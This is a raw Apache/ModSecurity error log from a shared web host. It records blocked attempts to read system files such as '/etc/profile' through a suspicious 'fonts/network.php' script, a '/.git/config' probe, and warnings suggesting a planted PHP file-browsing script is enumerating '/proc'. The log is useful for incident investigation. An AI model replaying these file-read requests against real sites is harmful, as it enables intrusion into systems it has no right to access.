[Mon May 11 20:42:03.451074 2026] [core:error] [pid 1501831:tid 1501856] [client 4.193.137.131:14848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:03.940364 2026] [core:error] [pid 1516058:tid 1516107] [client 4.193.137.131:14887] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:03.940399 2026] [core:error] [pid 1516058:tid 1516107] [client 4.193.137.131:14887] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:04.416399 2026] [core:error] [pid 1511173:tid 1511183] [client 4.193.137.131:14881] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:04.416431 2026] [core:error] [pid 1511173:tid 1511183] [client 4.193.137.131:14881] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:04.901313 2026] [core:error] [pid 1516058:tid 1516113] [client 4.193.137.131:14593] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:04.901350 2026] [core:error] [pid 1516058:tid 1516113] [client 4.193.137.131:14593] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:05.417455 2026] [core:error] [pid 1511173:tid 1511188] [client 4.193.137.131:14908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:05.417492 2026] [core:error] [pid 1511173:tid 1511188] [client 4.193.137.131:14908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:05.894681 2026] [core:error] [pid 1534836:tid 1534891] [client 4.193.137.131:21526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:05.894713 2026] [core:error] [pid 1534836:tid 1534891] [client 4.193.137.131:21526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:06.405512 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:21557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:06.405544 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:21557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:06.911286 2026] [core:error] [pid 1501883:tid 1501886] [client 4.193.137.131:21558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:06.911316 2026] [core:error] [pid 1501883:tid 1501886] [client 4.193.137.131:21558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:07.425358 2026] [core:error] [pid 1511173:tid 1511200] [client 4.193.137.131:21504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:07.425386 2026] [core:error] [pid 1511173:tid 1511200] [client 4.193.137.131:21504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:07.933458 2026] [core:error] [pid 1516058:tid 1516106] [client 4.193.137.131:21510] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:07.933490 2026] [core:error] [pid 1516058:tid 1516106] [client 4.193.137.131:21510] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:08.454369 2026] [core:error] [pid 1511173:tid 1511176] [client 4.193.137.131:21524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:08.454404 2026] [core:error] [pid 1511173:tid 1511176] [client 4.193.137.131:21524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:08.971435 2026] [core:error] [pid 1501883:tid 1501898] [client 4.193.137.131:14869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:08.971493 2026] [core:error] [pid 1501883:tid 1501898] [client 4.193.137.131:14869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:09.530517 2026] [core:error] [pid 1502013:tid 1502031] [client 4.193.137.131:21563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:09.530553 2026] [core:error] [pid 1502013:tid 1502031] [client 4.193.137.131:21563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:10.035590 2026] [core:error] [pid 1516058:tid 1516095] [client 4.193.137.131:21513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:10.035642 2026] [core:error] [pid 1516058:tid 1516095] [client 4.193.137.131:21513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:10.522245 2026] [core:error] [pid 1534836:tid 1534884] [client 4.193.137.131:21515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:10.522284 2026] [core:error] [pid 1534836:tid 1534884] [client 4.193.137.131:21515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:11.009672 2026] [core:error] [pid 1501831:tid 1501846] [client 4.193.137.131:21546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:11.009708 2026] [core:error] [pid 1501831:tid 1501846] [client 4.193.137.131:21546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:11.539364 2026] [core:error] [pid 1501883:tid 1501887] [client 4.193.137.131:14853] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:11.539400 2026] [core:error] [pid 1501883:tid 1501887] [client 4.193.137.131:14853] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:12.027897 2026] [core:error] [pid 1502013:tid 1502038] [client 4.193.137.131:21541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:12.027938 2026] [core:error] [pid 1502013:tid 1502038] [client 4.193.137.131:21541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:12.507330 2026] [core:error] [pid 1534836:tid 1534880] [client 4.193.137.131:21523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:12.507366 2026] [core:error] [pid 1534836:tid 1534880] [client 4.193.137.131:21523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:12.989453 2026] [core:error] [pid 1501831:tid 1501852] [client 4.193.137.131:21506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:12.989487 2026] [core:error] [pid 1501831:tid 1501852] [client 4.193.137.131:21506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 20:42:13.287854 2026] [security2:error] [pid 1534836:tid 1534883] [client 216.73.216.110:58571] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/profile found within ARGS:filesrc: /etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIjBdeaRXe5lR8y0ZOOXgAAAUw"]
[Mon May 11 20:42:13.288813 2026] [security2:error] [pid 1534836:tid 1534883] [client 216.73.216.110:58571] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIjBdeaRXe5lR8y0ZOOXgAAAUw"]
[Mon May 11 20:42:13.409885 2026] [security2:error] [pid 1534836:tid 1534883] [client 216.73.216.110:58571] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIjBdeaRXe5lR8y0ZOOXgAAAUw"]
[Mon May 11 20:42:35.024981 2026] [security2:error] [pid 1502013:tid 1502038] [client 43.165.195.234:57844] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIjG5Yn-x0CHsbEbP2orAAAAIs"]
[Mon May 11 20:42:53.401243 2026] [:error] [pid 1534836:tid 1534890] [client 114.119.136.64:33993] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/login-form/
[Mon May 11 20:43:19.871537 2026] [security2:error] [pid 1511173:tid 1511182] [client 49.51.195.195:48326] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/le-pmr/les-adherents/"] [unique_id "agIjR_jVc-A-CSptvm1tlAAAAEY"]
[Mon May 11 20:43:22.658665 2026] [ssl:error] [pid 1511173:tid 1511186] (EAI 2)Name or service not known: [client 66.249.75.36:43936] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:43:22.661887 2026] [ssl:error] [pid 1511173:tid 1511186] AH01941: stapling_renew_response: responder error
[Mon May 11 20:43:23.117865 2026] [ssl:error] [pid 1501831:tid 1501842] (EAI 2)Name or service not known: [client 66.249.75.38:60511] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:43:23.118091 2026] [ssl:error] [pid 1501831:tid 1501842] AH01941: stapling_renew_response: responder error
[Mon May 11 20:43:23.617665 2026] [ssl:error] [pid 1511173:tid 1511197] (EAI 2)Name or service not known: [client 66.249.87.132:59185] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:43:23.617690 2026] [ssl:error] [pid 1511173:tid 1511197] AH01941: stapling_renew_response: responder error
[Mon May 11 20:43:50.588137 2026] [security2:error] [pid 1502013:tid 1502040] [client 216.73.216.110:42657] ModSecurity: Warning. Matched phrase "etc/redhat-release" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/redhat-release found within ARGS:filesrc: /etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIjZpYn-x0CHsbEbP2o9wAAAI0"]
[Mon May 11 20:43:50.589200 2026] [security2:error] [pid 1502013:tid 1502040] [client 216.73.216.110:42657] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIjZpYn-x0CHsbEbP2o9wAAAI0"]
[Mon May 11 20:43:50.696289 2026] [security2:error] [pid 1502013:tid 1502040] [client 216.73.216.110:42657] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIjZpYn-x0CHsbEbP2o9wAAAI0"]
PHP Warning:  filesize(): stat failed for /proc/229/task/229/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/229/task/229/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/229/task/229/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/229/task/229/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/229/task/229/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/229/task/229/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:44:35.710446 2026] [authz_core:error] [pid 1502013:tid 1502066] [client 47.128.28.149:65004] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/block-patterns/error_log
[Mon May 11 20:45:08.209310 2026] [security2:error] [pid 1516058:tid 1516110] [client 43.135.139.165:39276] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/"] [unique_id "agIjtCMeXtzav-mi9SyspAAAANQ"], referer: http://www.piregwan-genesis.com
[Mon May 11 20:45:41.527110 2026] [security2:error] [pid 1534836:tid 1534873] [client 43.157.38.131:44312] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIj1deaRXe5lR8y0ZOPvgAAAUI"]
[Mon May 11 20:45:42.998293 2026] [authz_core:error] [pid 1534836:tid 1534879] [client 47.128.58.29:37198] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/error_log
[Mon May 11 20:45:50.915920 2026] [security2:error] [pid 1511173:tid 1511200] [client 129.226.193.122:41542] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pweil.com"] [uri "/"] [unique_id "agIj3vjVc-A-CSptvm1uQQAAAFg"]
[Mon May 11 20:46:04.432313 2026] [security2:error] [pid 1516058:tid 1516106] [client 43.157.149.188:39134] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/blog"] [unique_id "agIj7CMeXtzav-mi9Sys4gAAANA"]
[Mon May 11 20:46:10.090591 2026] [security2:error] [pid 1501831:tid 1501833] [client 43.157.149.188:43662] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/blog/"] [unique_id "agIj8lNddpkriGUb6ZVzVgAAAQA"], referer: https://www.maelbailly.fr/blog
[Mon May 11 20:46:25.414195 2026] [security2:error] [pid 1502013:tid 1502050] [client 101.32.239.179:55988] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/transmission-familiale-et-lbo/"] [unique_id "agIkAZYn-x0CHsbEbP2pmQAAAJg"]
[Mon May 11 20:46:42.738274 2026] [security2:error] [pid 1534836:tid 1534890] [client 43.159.128.247:48228] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/contact.php"] [unique_id "agIkEteaRXe5lR8y0ZOP_wAAAVM"]
PHP Warning:  filesize(): stat failed for /proc/21/task/21/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/21/task/21/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/21/task/21/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/21/task/21/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/21/task/21/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/21/task/21/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/54/task/54/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/54/task/54/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/54/task/54/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/54/task/54/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/54/task/54/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/54/task/54/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:47:46.354879 2026] [security2:error] [pid 1511173:tid 1511183] [client 43.152.72.247:60890] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIkUvjVc-A-CSptvm1u0AAAAEc"]
PHP Warning:  filesize(): stat failed for /proc/692/task/692/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/692/task/692/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/692/task/692/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/692/task/692/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/692/task/692/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/692/task/692/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:48:01.067569 2026] [security2:error] [pid 1501831:tid 1501837] [client 213.209.159.113:57058] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIkYVNddpkriGUb6ZVz4QAAAQQ"]
[Mon May 11 20:48:01.067881 2026] [security2:error] [pid 1501831:tid 1501837] [client 213.209.159.113:57058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIkYVNddpkriGUb6ZVz4QAAAQQ"]
